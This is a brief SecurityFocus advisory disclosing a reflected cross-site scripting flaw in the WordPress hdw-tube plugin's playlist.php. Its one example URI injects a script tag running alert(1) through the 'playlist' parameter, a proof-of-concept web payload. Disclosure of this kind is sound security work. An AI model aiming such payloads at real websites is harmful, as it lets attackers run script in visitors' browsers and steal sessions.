WordPress hdw-tube Plugin 'playlist.php' Cross Site Scripting Vulnerability

The following example URIs are available:

http://www.example.com/wp-content/plugins/hdw-tube/playlist.php?playlist="><script>alert(1);</script><"


 

Privacy Statement
Copyright 2010, SecurityFocus